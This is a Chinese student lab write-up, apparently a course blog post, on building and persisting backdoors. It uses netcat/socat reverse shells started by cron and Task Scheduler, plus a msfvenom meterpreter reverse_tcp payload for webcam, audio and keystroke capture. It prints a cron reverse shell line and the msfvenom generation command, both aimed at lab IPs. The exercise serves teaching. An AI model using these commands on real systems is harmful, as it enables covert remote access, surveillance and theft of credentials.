zoukankan      html  css  js  c++  java
  • 20145223杨梦云 《网络对抗》 后门原理与实践

    20145223杨梦云 《网络对抗》 后门原理与实践

    一、基础问题回答

    (1)例举你能想到的一个后门进入到你系统中的可能方式?

    ·我们在网上下载一些应用软件的时候,或者是下载一些免费的音乐电影之类的东西,还有在安装软件的过程中一些捆绑的软件,浏览不可信的网页,都有可能会让后门进入到我们的系统中。

    (2)例举你知道的后门如何启动起来(win及linux)的方式?

    ·win:1、直接双击后门程序 2、通过Windows启动任务计划自动开启后门

    ·linux:利用cron自启动。

    (3)Meterpreter有哪些给你映像深刻的功能?

    ·获取摄像头:比如……现在我在写博客,很可能有个人就在通过这个小黑洞盯着你(= =|||)

    ·音频:原来笔记本自带麦克风其实很危险?这个和摄像头一样简直没有隐私

    ·键盘记录和截屏:设想一下一个人正在逛淘宝,然后后门截屏被第二个人发现了,诶呀赶紧看看他都输了什么密码用户名然后等他买完了自己接着买呀岂不是美滋滋……

    (4)如何发现自己有系统有没有被安装后门?

    我感觉这个有点类似于如何发现病毒和木马
    ·最简单的开启杀毒软件查杀
    ·抓包工具看看自己的电脑有没有发送什么奇奇怪怪的数据到一个莫名的ip上,检查有没有在后台下载什么其他程序
    ·开启文件监视,注册表监视,看看有没有什么新的文件或注册表
    总结一下大概就是释放可疑新文件,添加可疑新注册项,运行工具后连接其他IP

    实验总结与体会

    (1)之前都没有发现原来自己的系统真的是很脆弱,首先想到的就是在装一些常用软件经常会遇到一些捆绑流氓软件,有时候没注意自定义安装就可能把后门程序装到电脑中。还有就是在实验的时候给我一种杀毒软件形同虚设的感觉,并没有想象中那么安全可靠。
    (2)同学的win10系统在做提权的时候还遇到了问题,原因貌似是win10的安全权限提高了,不过win8系统也有它的好处,比如我实验就做的非常顺利没有遇到这样的问题……
    (ps:蔡野同学说要糊上摄像头,摄像头被糊上的话我的电脑屏幕亮度就会整个暗下去调回来好麻烦……好像暴露了什么)

    二、实验内容和步骤

    (1)使用netcat获取主机操作Shell,cron启动

    1、Windows获得Linux的Shell
    kali自带nc,windows需要下载后解压运行,然后windows运行ncat监听本机的5223端口,通过Linux反弹连接windows得到shell:

    2、Linux获得 Windows的Shell:
    Linux运行监听指令:

    Windows反弹连接:

    这里我查看了win8主机的IP地址,但是因为中文的原因所以在kali虚拟机上看到的就都是乱码= =。

    3、cron启动
    kali下终端使用crontab -e修改配置文件,即选择你想要启动的时间,加入下面一行:

    24* * * * /bin/netcat 172.20.10.2 5223 -e /bin/sh  
    

    意思就是在每个小时24分的时候如果有这么一台ip为172.20.10.2的主机通过5223这个端口链接,那么就会启动cron:

    因为我设置的时间是24分,在24分之前去链接linux虚拟机并不会反弹,在终端上是无法输入命令的,到24分的时候就可以了。

    (2)使用socat获取主机操作Shell,任务计划启动

    1、kali将cmd绑定为5223这个端口,准备好反弹链接:

    2、windows主机开启监听5223端口,成功获取shell后可以试着查看kali虚拟机目录下的内容(这里的中文并不会出现乱码)

    3、在win8系统中,打开控制面板——>所有控制面板项——>管理工具中,找到任务计划程序,打开新创建一个任务:

    在操作里设置一下主控机的ip,端口号:

    获取得到windows的操作权限,可以查看windows的相关信息:

    (3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

    1、 msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.20.10.10 LPORT=23 -f exe >20145223.exe 来生成后门程序,然后发送到windows机中。(如果直接复制到主机上就会被杀毒软件查杀,因此用这种方式,我该说杀毒软件可靠呢还是不可靠呢=-=)
    文件夹下多了一个20145223的可执行文件:

    2、对msf的端口号和ip地址进行设置:

    3、当windows打开20145223的可执行文件后,linux就可以获取到这台主机的shell:
    查看ip信息什么的:

    查看主机的系统信息:

    查看一下后门程序所在的目录,之后可以转移到其他目录下,以防被发现:

    (4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

    1、和上一步一样,设置好msf后打开后门程序获取windows的shell,进行提权操作:

    2、在键盘上建个txt文件进行测试,假装自己在输一个重要的密码:

  • 相关阅读:
    2018-2019-2 网络对抗技术 20165321 Exp3 免杀原理与实践
    2018-2019-2 网络对抗技术 20165321 Exp2 后门原理与实践
    2018-2019-2 网络对抗技术 20165321 Exp1 PC平台逆向破解
    2018-2019-2 《网络对抗技术》Exp0 Kali安装 Week1 20165321
    2017-2018-1 JAVA实验站 冲刺 day07
    2017-2018-1 JAVA实验站 冲刺 day06
    2017-2018-1 JAVA实验站 冲刺 day05
    2017-2018-1 JAVA实验站 冲刺 day04
    2017-2018-1 JAVA实验站 冲刺 day03
    2017-2018-1 JAVA实验站 冲刺 day02
  • 原文地址:https://www.cnblogs.com/20145223ymy/p/6580922.html
Copyright © 2011-2022 走看看